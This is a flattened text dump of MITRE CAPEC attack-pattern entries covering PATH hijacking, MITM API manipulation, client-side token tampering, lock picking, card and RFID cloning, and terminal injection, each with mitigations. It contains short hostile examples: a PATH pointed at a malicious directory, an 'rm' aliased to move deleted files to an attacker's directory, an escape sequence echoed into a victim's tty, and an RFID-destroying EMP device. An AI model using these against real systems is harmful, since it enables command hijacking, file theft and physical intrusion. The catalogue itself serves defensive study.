This pattern of attacks possesses no injection vector, in its normal instances, as it affects clients fundamentally vulnerable to client-side trust issues. One exception to this rule exists: attacks making use of second-order injection attacks (SQL, XSS, or similar command injection) may 'deliver' an attack, through an intermediate server or data store, to a peer-client, or another user's use of the same client. In the case of the second instance (another user's use) this vector seems onerous but would be necessary in circumstances in which the hosting system protects the application well but implicitly trusts (potentially malicious) data received from the server (such as may be the case in kiosks well-protected through physical means).
Client-side software, whether it be a monolithic application, client/server, or n-tier (web-based).
311
Targeted
525
Targeted
312
Targeted
314
Secondary
315
Secondary
318
Secondary
1000
Attack Pattern
ChildOf
167
No sensitive or confidential information must be stored in client distributions. This includes content such as passwords or encryption keys. In cases where this is necessary, avoid storing any such information in plaintext
All information arriving from a client must be validated before use.
Reluctance to Trust
Never Assuming that Your Secrets Are Safe
Never Use Unvalidated Input as Part of a Directive to any Internal Component
Treat the Entire Inherited Process Context as Unvalidated Input
Use Well-Known Cryptography Appropriately and Correctly
Reconnaissance
Exploitation
High
Medium
Low
All
All
All
All
CAPEC Content Team
The MITRE Corporation
2014-06-23
This attack loads a malicious resource into a program's standard path used to bootstrap and/or provide contextual information for a program like a path variable or classpath. J2EE applications and other component based applications that are built from multiple binaries can have very long list of dependencies to execute. If one of these libraries and/or references is controllable by the attacker then application controls can be circumvented by the attacker.
A standard UNIX path looks similar to this
/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin
If the attacker modifies the path variable to point to a locale that includes malicious resources then the user unwittingly can execute commands on the attackers' behalf:
/evildir/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin
This is a form of usurping control of the program and the attack can be done on the classpath, database resources, or any other resources built from compound parts. At runtime detection and blocking of this attack is nearly impossible, because the configuration allows execution.
The attacker must be able to write to redirect search paths on the victim host.
Very High
High
Modification of Resources
This attack can be accomplished in two ways. An attacker can insert a malicious program into the path or classpath so that when a known command is executed then the system instead executes the trojans. Another method is to redirect commands by aliasing one legitimate command to another to create unexpected results. the Unix command "rm" could be aliased to "mv" and move all files the victim thinks they are deleting to a directory the attacker controls. In a Unix shell .profile setting
alias rm=mv /usr/home/attacker
In this case the attacker retains a copy of all the files the victim attempts to remove.
Low
To identify and execute against an over-privileged system interface
Design: Enforce principle of least privilege
Design: Ensure that the program's compound parts, including all system dependencies, classpath, path, and so on, are secured to the same or higher level assurance as the program
Implementation: Host integrity monitoring
Confidentiality
Integrity
Availability
Execute unauthorized code or commands
Run Arbitrary Code
Confidentiality
Access_Control
Authorization
Gain privileges / assume identity
426
Targeted
427
Targeted
428
Secondary
706
Targeted
1000
Attack Pattern
ChildOf
159
Exploitation
Medium
Medium
Medium
All
All
All
All
G. Hoglund
G. McGraw
Exploiting Software: How to Break Code
Addison-Wesley
February 2004
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker hosts an event within an application framework and then monitors the data exchanged during the course of the event for the purpose of harvesting any important data leaked during the transactions. One example could be harvesting lists of usernames or userIDs for the purpose of sending spam messages to those users. One example of this type of attack involves the attacker creating an event within the sub-application. Assume the attacker hosts a "virtual sale" of rare items. As other users enter the event, the attacker records via MITM proxy the user_ids and usernames of everyone who attends. The attacker would then be able to spam those users within the application using an automated script.
Application Layer
Client-side
Web Application
Uses Protocol
Uses Protocol
Targeted software is utilizing application framework APIs
Low
A software program that allows a user to man-in-the-middle communications between the client and server, such as a man-in-the-middle proxy.
311
Targeted
319
Targeted
419
Secondary
602
Secondary
1000
Attack Pattern
ChildOf
117
Tom Stracener
Sean Barnum
So Many Ways [...]: Exploiting Facebook and YoVille
Defcon 18
2010
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker manipulates either egress or ingress data from a client within an application framework in order to change the content of messages. Performing this attack can allow the attacker to gain unauthorized privileges within the application, or conduct attacks such as phishing, deceptive strategies to spread malware, or traditional web-application attacks. The techniques require use of specialized software that allow the attacker to man-in-the-middle communications between the web browser and the remote system. Despite the use of MITM software, the attack is actually directed at the server, as the client is one node in a series of content brokers that pass information along to the application framework. Additionally, it is not true "Man-in-the-Middle" attack at the network layer, but an application-layer attack the root cause of which is the master applications trust in the integrity of code supplied by the client.
Application Layer
Server-side
Host
Uses Protocol
Uses Protocol
Targeted software is utilizing application framework APIs
Low
A software program that allows a user to man-in-the-middle communications between the client and server, such as a man-in-the-middle proxy.
471
Targeted
345
Targeted
346
Targeted
602
Secondary
311
Secondary
1000
Attack Pattern
ChildOf
94
Tom Stracener
Sean Barnum
So Many Ways [...]: Exploiting Facebook and YoVille
Defcon 18
2010
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker hosts or joins an event or transaction within an application framework in order to change the content of messages or items that are being exchanged. Performing this attack allows the attacker to manipulate content in such a way as to produce messages or content that look authentic but may contain deceptive links, substitute one item or another, spoof an existing item and conduct a false exchange, or otherwise change the amounts or identity of what is being exchanged. The techniques require use of specialized software that allow the attacker to man-in-the-middle communications between the web browser and the remote system in order to change the content of various application elements. Often, items exchanged in game can be monetized via sales for coin, virtual dollars, etc. The purpose of the attack is for the attack to scam the victim by trapping the data packets involved the exchange and altering the integrity of the transfer process.
Application Layer
Server-side
Host
Uses Protocol
Uses Protocol
Targeted software is utilizing application framework APIs
Medium
A software program that allows a user to man-in-the-middle communications between the client and server, such as a man-in-the-middle proxy.
471
Targeted
345
Targeted
346
Targeted
602
Secondary
311
Secondary
1000
Attack Pattern
ChildOf
384
Tom Stracener
Sean Barnum
So Many Ways [...]: Exploiting Facebook and YoVille
Defcon 18
2010
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker manipulates either egress or ingress data from a client within an application framework in order to change the destination and/or content of links/buttons displayed to a user within API messages. Performing this attack allows the attacker to manipulate content in such a way as to produce messages or content that looks authentic but contains links/buttons that point to an attacker controlled destination. Some applications make navigation remapping more difficult to detect because the actual HREF values of images, profile elements, and links/buttons are masked. One example would be to place an image in a user's photo gallery that when clicked upon redirected the user to an off-site location. Also, traditional web vulnerabilities (such as CSRF) can be constructed with remapped buttons or links. In some cases navigation remapping can be used for Phishing attacks or even means to artificially boost the page view, user site reputation, or click-fraud.
Transport Layer
Server-side
Host
Uses Protocol
Uses Protocol
Targeted software is utilizing application framework APIs
Medium
A software program that allows a user to man-in-the-middle communications between the client and server, such as a man-in-the-middle proxy.
471
Targeted
345
Targeted
346
Targeted
602
Secondary
311
Secondary
1000
Attack Pattern
ChildOf
385
Tom Stracener
Sean Barnum
So Many Ways [...]: Exploiting Facebook and YoVille
Defcon 18
2010
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker manipulates either egress or ingress data from a client within an application framework in order to change the content of messages and thereby circumvent the expected application logic. Performing this attack allows the attacker to manipulate content in such a way as to produce messages or content that look authentic but may contain deceptive links, spam-like content, or links to the attackers' code. In general, content-spoofing within an application API can be employed to stage many different types of attacks varied based on the attackers' intent. When the goal is to spread malware, deceptive content is created such as modified links, buttons, or images, that entice users to click on those items, all of which point to a malicious URI. The techniques require use of specialized software that allow the attacker to man-in-the-middle communications between the web browser and the remote system in order to change the destination of various application interface elements.
Application Layer
Server-side
Host
Uses Protocol
Uses Protocol
Targeted software is utilizing application framework APIs
Medium
A software program that allows a user to man-in-the-middle communications between the client and server, such as a man-in-the-middle proxy.
471
Targeted
345
Targeted
346
Targeted
602
Secondary
311
Secondary
1000
Attack Pattern
ChildOf
386
Tom Stracener
Sean Barnum
So Many Ways [...]: Exploiting Facebook and YoVille
Defcon 18
2010
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker manipulates either egress or ingress data from a client within an application framework in order to change the destination and/or content of buttons displayed to a user within API messages. Performing this attack allows the attacker to manipulate content in such a way as to produce messages or content that looks authentic but contains buttons that point to an attacker controlled destination. For example, an in-game event occurs and the attacker traps the result, which turns out to be a form that will be populated to their primary profile. The attacker, using a MITM proxy, observes the following data:
[Button][Claim_Item]Sourdough_Cookie[URL_IMG]foo[/URL_IMG][Claim_Link]bar[/Claim_Link]
By altering the destination of "Claim_Link" to point to the attackers' server an unwitting victim can be enticed to click the link. Another example would be for the attacker to rewrite the button destinations for an event so that clicking "Yes" or "No" causes the user to load the attackers' code.
Application Layer
Server-side
Host
Uses Protocol
Uses Protocol
Targeted software is utilizing application framework APIs
Medium
A software program that allows a user to man-in-the-middle communications between the client and server, such as a man-in-the-middle proxy.
471
Targeted
345
Targeted
346
Targeted
602
Secondary
311
Secondary
1000
Attack Pattern
ChildOf
386
Tom Stracener
Sean Barnum
So Many Ways [...]: Exploiting Facebook and YoVille
Defcon 18
2010
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker manipulates either egress or ingress data from a client within an application framework in order to change the content of messages. Performing this attack allows the attacker to manipulate content in such a way as to produce messages or content that look authentic but may contain deceptive links, spam-like content, or links to the attackers' code. In general, content-spoofing within an application API can be employed to stage many different types of attacks varied based on the attackers' intent. The techniques require use of specialized software that allow the attacker to man-in-the-middle communications between the web browser and the remote system.
Application Layer
Client-side
Host
Uses Protocol
Uses Protocol
Targeted software is utilizing application framework APIs
Low
A software program that allows a user to man-in-the-middle communications between the client and server, such as a man-in-the-middle proxy.
345
Targeted
346
Targeted
602
Secondary
311
Secondary
1000
Attack Pattern
ChildOf
384
Tom Stracener
Sean Barnum
So Many Ways [...]: Exploiting Facebook and YoVille
Defcon 18
2010
CAPEC Content Team
The MITRE Corporation
2014-06-23
In circumstances where an application holds important data client-side in tokens (cookies, URLs, data files, and so forth) that data can be manipulated. If client or server-side application components reinterpret that data as authentication tokens or data (such as store item pricing or wallet information) then even opaquely manipulating that data may bear fruit for an Attacker. In this pattern an attacker undermines the assumption that client side tokens have been adequately protected from tampering through use of encryption or obfuscation.
Enumerate information passed to client side
The attacker identifies the parameters used as part of tokens to take business or security decisions
Use WebScarab to reveal hidden fields while browsing.
env-Web
Use a sniffer to capture packets
env-ClientServer env-Peer2Peer env-CommProtocol
View source of web page to find hidden fields
env-Web
Examine URL to see if any opaque tokens are in it
env-Web
Disassemble or decompile client-side application
env-ClientServer env-Peer2Peer
Use debugging tools such as File Monitor, Registry Monitor, Debuggers, etc.
env-ClientServer env-Peer2Peer
Opaque hidden form fields in a web page
env-Web
Opaque session tokens/tickets
env-Web env-Peer2Peer env-ClientServer env-CommProtocol
Opaque protocol fields
env-ClientServer env-Peer2Peer env-CommProtocol
Opaque Resource Locator
env-Web env-Peer2Peer env-ClientServer env-CommProtocol
At least one opaque client-side token found
No opaque client-side tokens found
Determine protection mechanism for opaque token
The attacker determines the protection mechanism used to protect the confidentiality and integrity of these data tokens. They may be obfuscated or a full blown encryption may be used.
Look for signs of well-known character encodings
env-Web env-ClientServer env-Peer2Peer env-CommProtocol
Look for cryptographic signatures
env-Web env-ClientServer env-Peer2Peer env-CommProtocol
Look for delimiters or other indicators of structure
env-Web env-ClientServer env-Peer2Peer env-CommProtocol
Standard signatures of well-known encodings detected
env-Web env-ClientServer env-Peer2Peer env-CommProtocol
Token or structural block's length being multiple of well-known block size of a cryptographic algorithm
env-Web env-ClientServer env-Peer2Peer env-CommProtocol
Clear structural boundaries or delimiters
env-Web env-ClientServer env-Peer2Peer env-CommProtocol
Failure outcome in previous step
env-Web env-ClientServer env-Peer2Peer env-CommProtocol
Protection/encoding scheme identified
No information about protection/encoding scheme could not be determined
Modify parameter/token values
Trying each parameter in turn, the attacker modifies the values
Modify tokens logically
env-Web env-ClientServer env-Peer2Peer env-CommProtocol
Modify tokens arithmetically
env-Web env-ClientServer env-Peer2Peer env-CommProtocol
Modify tokens bitwise
env-Web env-ClientServer env-Peer2Peer env-CommProtocol
Modify structural components of tokens
env-Web env-ClientServer env-Peer2Peer env-CommProtocol
Modify order of parameters/tokens
env-Web env-ClientServer env-Peer2Peer env-CommProtocol
Success outcome in first step.
env-Web env-ClientServer env-Peer2Peer env-CommProtocol
Failure outcome in first step
env-Web env-ClientServer env-Peer2Peer env-CommProtocol
Cycle through values for each parameter.
Depending on the nature of the application, the attacker now cycles through values of each parameter and observes the effects of this modification in the data returned by the server
Use network-level packet injection tools such as netcat
env-Web env-ClientServer env-Peer2Peer env-CommProtocol
Use application-level data modification tools such as Tamper Data, WebScarab, TamperIE, etc.
env-Web
Use modified client (modified by reverse engineering)
env-ClientServer env-Peer2Peer env-CommProtocol
Use debugging tools to modify data in client
env-ClientServer env-Peer2Peer
Success outcome in first step
env-Web env-ClientServer env-Peer2Peer env-CommProtocol
Failure outcome in first step
env-Web env-ClientServer env-Peer2Peer env-CommProtocol
Subversion of security controls on server
Client token reset by server
Detailed error message describing problem with token, received from server
Unexpected/invalid token/parameter value in application logs on server
Reset session upon receipt of unexpected/invalid token/parameter value
An attacker already has some access to the system or can steal the client based data tokens from another user who has access to the system.
For an Attacker to viably execute this attack, some data (later interpreted by the application) must be held client-side in a way that can be manipulated without detection. This means that the data or tokens are not CRCd as part of their value or through a separate meta-data store elsewhere.
Medium
Very High
Modification of Resources
With certain price watching websites, that aggregate products available prices, the user can buy items through whichever vendors has product availability, the best price, or other differentiator. Once a user selects an item, the site must broker the purchase of that item with the vendor. Because vendors sell the same product through different channel partners at different prices, token exchange between price watching sites and selling vendors will often contain pricing information. With some price watching sites, manipulating URL-data (which is encrypted) even opaquely yields different prices charged by the fulfilling vendor. If the manipulated price turns out higher, the Attacker can cancel purchase. If the Attacker succeeded in manipulating the token and creating a lower price, he/she proceeds.
Upon successful authentication user is granted an encrypted authentication cookie by the server and it is stored on the client. One piece of information stored in the authentication cookie reflects the access level of the user (e.g. "u" for user). The authentication cookie is encrypted using the Electronic Code Book (ECB) mode, that naively encrypts each of the plaintext blocks to each of the ciphertext blocks separately. An attacker knows the structure of the cookie and can figure out what bits (encrypted) store the information relating to the access level of the user. An attacker modifies the authentication cookie and effectively substitutes "u" for "a" by flipping some of the corresponding bits of ciphertext (trial and error). Once the correct "flip" is found, when the system is accessed, the attacker is granted administrative privileges in the system. Note that in this case an attacker did not have to figure out the exact encryption algorithm or find the secret key, but merely exploit the weakness inherent in using the ECB encryption mode.
Archangel Weblog 0.90.02 allows remote attackers to bypass authentication by setting the ba_admin cookie to 1.
CVE-2006-0944
Medium
If the client site token is obfuscated.
High
If the client site token is encrypted.
The Attacker needs no special hardware-based resources in order to conduct this attack. Software plugins, such as Tamper Data for Firefox, may help in manipulating URL- or cookie-based data.
Tamper with the client side data token and observe the effects it has on interaction with the system.
This attack is in and of itself a trial-and-error-based probing technique.
One solution to this problem is to protect encrypted data with a CRC of some sort. If knowing who last manipulated the data is important, then using a cryptographic "message authentication code" (or hMAC) is prescribed. However, this guidance is not a panacea. In particular, any value created by (and therefore encrypted by) the client, which itself is a "malicious" value, all the protective cryptography in the world can't make the value 'correct' again. Put simply, if the client has control over the whole process of generating and encoding the value, then simply protecting its integrity doesn't help.
Make sure to protect client side authentication tokens for confidentiality (encryption) and integrity (signed hash)
Make sure that all session tokens use a good source of randomness
Perform validation on the server side to make sure that client side data tokens are consistent with what is expected.
Integrity
Modify application data
Confidentiality
Access_Control
Authorization
Gain privileges / assume identity
353
Targeted
285
Secondary
302
Targeted
472
Targeted
565
Targeted
315
Targeted
539
Targeted
384
Secondary
233
Secondary
1000
Attack Pattern
ChildOf
22
1000
Category
ChildOf
223
Sensitive information stored client side must be integrity checked upon return before use
Reluctance to Trust
Never Assuming that your Secrets are Safe
Least Privilege
Complete Mediation
Never Use Unvalidated Input as Part of a Directive to any Internal Component
Penetration
Exploitation
High
High
Low
All
All
All
All
CAPEC Content Team
The MITRE Corporation
2014-06-23
Facilities often used layered models for physical security such as traditional locks, Electronic-based card entry systems, coupled with physical alarms. Hardware security mechanisms range from the use of computer case and cable locks as well as RFID tags for tracking computer assets. This layered approach makes it difficult for random physical security breaches to go unnoticed, but is less effective at stopping deliberate and carefully planned break-ins. Avoiding detection begins with evading building security and surveillance and methods for bypassing the electronic or physical locks which secure entry points.
Stuart McClure
Joel Scambray
George Kurtz
Hacking Exposed: Network Security Secrets & Solutions
Chapter 9: Hacking Hardware
6th Edition
McGraw Hill
2009
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker uses techniques and methods to bypass physical security measures of a building or facility. Physical locks may range from traditional lock and key mechanisms, cable locks used to secure laptops or servers, locks on server cases, or other such devices. Techniques such as lock bumping, lock forcing via snap guns, or lock picking can be employed to bypass those locks and gain access to the facilities or devices they protect, although stealth, evidence of tampering, and the integrity of the lock following an attack, are considerations that may determine the method employed. Physical locks are limited by the complexity of the locking mechanism. While some locks may offer protections such as shock resistant foam to prevent bumping or lock forcing methods, many commonly employed locks offer no such countermeasures.
1000
Attack Pattern
ChildOf
390
Stuart McClure
Joel Scambray
George Kurtz
Hacking Exposed: Network Security Secrets & Solutions
Chapter 9: Hacking Hardware
6th Edition
McGraw Hill
2009
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker uses a bump key to force a lock on a building or facility and gain entry. Lock Bumping is the use of a special type of key that can be tapped or bumped to cause the pins within the lock to fall into temporary alignment, allowing the lock to be opened. Lock bumping allows an attacker to open a lock without having the correct key. A standard lock is secured by a set of internal pins that prevent the device from turning. Spring loaded driver pins push down on the key pins. When the correct key is inserted, the ridges on the key push the key pins up and against the driver pins, causing correct alignment which allows the lock cylinder to rotate. A bump key is a specially constructed key that exploits this design. When the bump key is struck or firmly tapped, its teeth transfer the force of the tap into the key pins, causing the lock to momentarily shift into proper alignment for the mechanism to be opened.
1000
Attack Pattern
ChildOf
391
Stuart McClure
Joel Scambray
George Kurtz
Hacking Exposed: Network Security Secrets & Solutions
Chapter 9: Hacking Hardware
6th Edition
McGraw Hill
2009
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker uses lock picking tools and techniques to bypass the locks on a building or facility. Lock picking is the use of a special set of tools to manipulate the pins within a lock. Different sets of tools are required for each type of lock. Lock picking attacks have the advantage of being non-invasive in that if performed correctly the lock will not be damaged. A standard lock pin-and-tumbler lock is secured by a set of internal pins that prevent the tumbler device from turning. Spring loaded driver pins push down on the key pins preventing rotation so that the bolt remains in a locked position.. When the correct key is inserted, the ridges on the key push the key pins up and against the driver pins, causing correct alignment which allows the lock cylinder to rotate. Most common locks, such as domestic locks in the US, can be picked using a standard 2 tools (i.e. a torsion wrench and a hook pick).
1000
Attack Pattern
ChildOf
391
Stuart McClure
Joel Scambray
George Kurtz
Hacking Exposed: Network Security Secrets & Solutions
Chapter 9: Hacking Hardware
6th Edition
McGraw Hill
2009
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker uses a Snap Gun, also known as a Pick Gun, to force the lock on a building or facility. A Pick Gun is a special type of lock picking instrument that works on similar principles as lock bumping. A snap gun is a hand-held device with an attached metal pick. The metal pick strikes the pins within the lock, transferring motion from the key pins to the driver pins and forcing the lock into momentary alignment. A standard lock is secured by a set of internal pins that prevent the device from turning. Spring loaded driver pins push down on the key pins. When the correct key is inserted, the ridges on the key push the key pins up and against the driver pins, causing correct alignment which allows the lock cylinder to rotate. A Snap Gun exploits this design by using a metal pin to strike all of the key pins at once, forcing the driver pins to shift into an unlocked position. Unlike bump keys or lock picks, a Snap Gun may damage the lock more easily, leaving evidence that the lock has been tampered with.
1000
Attack Pattern
ChildOf
391
Stuart McClure
Joel Scambray
George Kurtz
Hacking Exposed: Network Security Secrets & Solutions
Chapter 9: Hacking Hardware
6th Edition
McGraw Hill
2009
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker exploits security assumptions to bypass electronic locks or other forms of access controls. Most attacks against electronic access controls follow similar methods but utilize different tools. Some electronic locks utilize magnetic strip cards, others employ RFID tags embedded within a card or badge, or may involve more sophisticated protections such as voice-print, thumb-print, or retinal biometrics. Magnetic Strip and RFID technologies are the most widespread because they are cost effective to deploy and more easily integrated with other electronic security measures. These technologies share common weaknesses that an attacker can exploit to gain access to a facility protected by the mechanisms via copying legitimate cards or badges, or generating new cards using reverse-engineered algorithms.
1000
Attack Pattern
ChildOf
390
Stuart McClure
Joel Scambray
George Kurtz
Hacking Exposed: Network Security Secrets & Solutions
Chapter 9: Hacking Hardware
6th Edition
McGraw Hill
2009
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker bypasses the security of a card-based system by using techniques such as cloning access cards or using brute-force techniques. Card-based systems are widespread throughout business, government, and supply-chain management. Attacks against card-based systems vary widely based on the attackers' goals, but commonly include unauthorized reproduction of cards, brute-force creation of valid card-values, and attacks against systems which read or process card data. Due to the inherent weaknesses of card and badge security, high security environments will rarely rely upon the card or badge alone as a security mechanism. Common card based systems are used for financial transactions, user identification, and access control. Cloning attacks involve making an unauthorized copy of a user's card while brute-force attacks involve creating new cards with valid values. Denial of service attacks against card-based systems involve rendering the reader, or the card itself, to become disabled. Such attacks may be useful in a fail-closed system for keeping authorized users out of a location while a crime is in progress, whereas fail-open systems may grant access, or an alarm my fail to trigger, if an attacker disables or damages the card authentication device.
1000
Attack Pattern
ChildOf
395
Stuart McClure
Joel Scambray
George Kurtz
Hacking Exposed: Network Security Secrets & Solutions
Chapter 9: Hacking Hardware
6th Edition
McGraw Hill
2009
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker duplicates the data on a Magnetic strip card (i.e. 'swipe card' or 'magstripe') to gain unauthorized access to a physical location or a person's private information. Magstripe cards encode data on a band of iron-based magnetic particles arrayed in a stripe along a rectangular card. Most magstripe card data formats conform to ISO standards 7810, 7811, 7813, 8583, and 4909. The primary advantage of magstripe technology is ease of encoding and portability, but this also renders magnetic strip cards susceptible to unauthorized duplication. If magstripe cards are used for access control, all an attacker need do is obtain a valid card long enough to make a copy of the card and then return the card to its location (i.e. a co-worker's desk). Magstripe reader/writers are widely available as well as software for analyzing data encoded on the cards. By swiping a valid card, it becomes trivial to make any number of duplicates that function as the original.
1000
Attack Pattern
ChildOf
396
Stuart McClure
Joel Scambray
George Kurtz
Hacking Exposed: Network Security Secrets & Solutions
Chapter 9: Hacking Hardware
6th Edition
McGraw Hill
2009
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker analyzes the data on two or more magnetic strip cards and is able to generate new cards containing valid sequences that allow unauthorized access and/or impersonation of individuals. Often, magnetic strip encoding methods follow a common format for a given system laid out in up to three tracks. A single card may allow access to a corporate office complex shared by multiple companies. By analyzing how the data is stored on a card, it is also possible to create valid cards via brute-force attacks. For example, a single card can grant access to a building, a floor, and a suite number. Reading and analyzing data on multiple cards, then performing a difference analysis between data encoded on three different cards, can reveal clues as to how to generate valid cards that grant access to restricted areas of a building or suites/rooms within that building. Data stored on magstripe cards is often unencrypted, therefore comparing which data changes when two or more cards are analyzed can yield results that aid in determining the structure of the card data. A trivial example would be a common system data format on a data track which binary encodes the suite number of a building that a card will open. By creating multiple cards with differing binary encoded segments it becomes possible to enter unauthorized areas or pass through checkpoints giving the electronic ID of other persons.
The ability to calculate a card checksum and write out a valid checksum value. Some cards are protected by a checksum calculation, therefore it is necessary to determine what algorithm is being used to calculate the checksum and to employ that algorithm to calculate and write a new valid checksum for the card being created.
1000
Attack Pattern
ChildOf
396
Stuart McClure
Joel Scambray
George Kurtz
Hacking Exposed: Network Security Secrets & Solutions
Chapter 9: Hacking Hardware
6th Edition
McGraw Hill
2009
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker analyzes data returned by an RFID chip and uses this information to duplicate a RFID signal that responds identically to the target chip. In some cases RFID chips are used for building access control, employee identification, or as markers on products being delivered along a supply chain. Some organizations also embed RFID tags inside computer assets to trigger alarms if they are removed from particular rooms, zones, or buildings. Similar to Magnetic strip cards, RFID cards are susceptible to duplication (cloning) and reuse. RFID (Radio Frequency Identification) are passive devices which consist of an integrated circuit for processing RF signals and an antenna. RFID devices are passive in that they lack an on on-board power source. The majority of RFID chips operate on either the 13.56 MHz or 135 KHz frequency. The chip is powered when a signal is received by the antenna on the chip, powering the chip long enough to send a reply message. An attacker is able to capture and analyze RFID data by either stimulating the chip to respond or being proximate to the chip when it sends a response to a remote transmitter. This allows the attacker to duplicate the signal and conduct attacks such as gaining unauthorized access to a building or impersonating a user's identification.
1000
Attack Pattern
ChildOf
396
Stuart McClure
Joel Scambray
George Kurtz
Hacking Exposed: Network Security Secrets & Solutions
Chapter 9: Hacking Hardware
6th Edition
McGraw Hill
2009
CAPEC Content Team
The MITRE Corporation
2014-06-23
This attack relies on the attacker using unexpected formats for representing IP addresses. Networked applications may expect network location information in a specific format, such as fully qualified domains names, URL, IP address, or IP Address ranges. The issue that the attacker can exploit is that these design assumptions may not be validated against a variety of different possible encodings and network address location formats. Applications that use naming for creating policy namespaces for managing access control may be susceptible to being queried directly by IP addresses, which is ultimately a more generally authoritative way of communicating on a network.
Alternative IP addresses can be used by the attacker to bypass application access control in order to gain access to data that is only protected by obscuring its location.
In addition this type of attack can be used as a reconnaissance mechanism to provide entry point information that the attacker gathers to penetrate deeper into the system.
The target software must fail to anticipate all of the possible valid encodings of an IP/web address.
High
Medium
Injection
Protocol Manipulation
API Abuse
An attacker identifies an application server that applies a security policy based on the domain and application name, so the access control policy covers authentication and authorization for anyone accessing http://example.domain:8080/application. However, by putting in the IP address of the host the application authentication and authorization controls may be bypassed http://192.168.0.1:8080/application. The attacker relies on the victim applying policy to the namespace abstraction and not having a default deny policy in place to manage exceptions.
Low
The attacker has only to try IP address combinations.
Ability to communicate with server. Optionally, ability to capture output directly through synchronous communication or other method such as FTP.
Design: Default deny access control policies
Design: Input validation routines should check and enforce both input data types and content against a positive specification. In regards to IP addresses, this should include the authorized manner for the application to represent IP addresses and not accept user specified IP addresses and IP address formats (such as ranges)
Implementation: Perform input validation for all remote content.
Confidentiality
Access_Control
Authorization
Gain privileges / assume identity
Malicious input delivered through standard input
Varies with instantiation of attack pattern. Malicious payload may be passed directly from application client, such as the web browser.
Client machine and client network
Enables attacker to view and access unexpected network services.
291
Targeted
180
Targeted
41
Targeted
345
Targeted
697
Targeted
707
Targeted
1000
Attack Pattern
ChildOf
267
Penetration
Medium
Medium
High
All
All
All
All
G. Hoglund
G. McGraw
Exploiting Software: How to Break Code
Addison-Wesley
February 2004
CAPEC Content Team
The MITRE Corporation
2014-06-23
This attack exploits terminal devices that allow themselves to be written to by other users. The attacker sends command strings to the target terminal device hoping that the target user will hit enter and thereby execute the malicious command with their privileges. The attacker can send the results (such as copying /etc/passwd) to a known directory and collect once the attack has succeeded.
User terminals must have a permissive access control such as world writeable that allows normal users to control data on other user's terminals.
Very High
High
Injection
"Any system that allows other peers to write directly to its terminal process is vulnerable to this type of attack. If the terminals are available through being over-privileged (i.e. world-writable) or the attacker is an administrator, then a series of commands in this format can be used to echo commands out to victim terminals.
"$echo -e "\033[30m\033\132" > /dev/ttyXX
where XX is the tty number of the user under attack. This will paste the characters to another terminal (tty). Note this technique works only if the victim's tty is world writable (which it may not be). That is one reason why programs like write(1) and talk(1) in UNIX systems need to run setuid." [R.40.1][REF-2]
If the victim continues to hit "enter" and execute the commands, there are an endless supply of vectors available to the attacker, copying files, open up network connections, ftp out to servers, and so on.
Low
Access to a terminal on the target network
Design: Ensure that terminals are only writeable by named owner user and/or administrator
Design: Enforce principle of least privilege
Confidentiality
Access_Control
Authorization
Gain privileges / assume identity
Confidentiality
Read application data
Confidentiality
Integrity
Availability
Execute unauthorized code or commands
Run Arbitrary Code
Payload delivered through standard user terminal.
Command(s) executed directly on host, in other victim's terminal
Multi-user host
Enables attacker to execute server side code with any commands that the program owner has privileges to.
306
Targeted
74
Targeted
1000
Attack Pattern
ChildOf
249
Exploitation
High
High
Low
Mainframe
Other
UNIX-LINUX
All
G. Hoglund
G. McGraw
Exploiting Software: How to Break Code
Addison-Wesley
February 2004
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker uses methods to deactivate a passive RFID tag for the purpose of rendering the tag, badge, card, or object containing the tag unresponsive. RFID tags are used primarily for access control, inventory, or anti-theft devices. The purpose of attacking the RFID chip is to disable or damage the chip without causing damage to the object housing it. When correctly performed the RFID chip can be disabled or destroyed without visible damage or marking to whatever item or device containing the chip. Attacking the chip directly allows for the security device or method to be bypassed without directly damaging the device itself, such as an alarm system or computer system Various methods exist for damaging or deactivating RFID tags. For example, most common RFID chips can be permanently destroyed by creating a small electromagnetic pulse near the chip itself. One method employed requires the modifying a disposable camera by disconnecting the flash bulb and soldering a copper coil to the capacitor. Firing the camera in this configuration near any RFID chip-based device creates an EMP pulse sufficient to destroy the chip without leaving evidence of tampering. So far this attack has been demonstrated to work against RFID chips in the 13.56 MHz range.
1000
Attack Pattern
ChildOf
396
Stuart McClure
Joel Scambray
George Kurtz
Hacking Exposed: Network Security Secrets & Solutions
Chapter 9: Hacking Hardware
6th Edition
McGraw Hill
2009
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker exploits weaknesses in the physical hardware of a machine in order to gain unauthorized access to the device or system. Hacking hardware devices falls into several broad categories depending upon the relative sophistication of the attacker and the type of systems that are targeted. Attacks against hardware devices differ from software attacks in that hardware-based attacks target the chips, circuit boards, device ports, or other components that comprise a computer system or embedded system. The most common hardware devices which are attacked are computer systems such as laptops, desktops and server platforms. Sophisticated attacks may involve adding or removing jumpers to an exposed system, or applying sensors to portions of the motherboard to read data as it traverses the system bus.
Some level of physical access to the device being attacked.
Stuart McClure
Joel Scambray
George Kurtz
Hacking Exposed: Network Security Secrets & Solutions
Chapter 9: Hacking Hardware
6th Edition
McGraw Hill
2009
CAPEC Content Team
The MITRE Corporation
2014-06-23
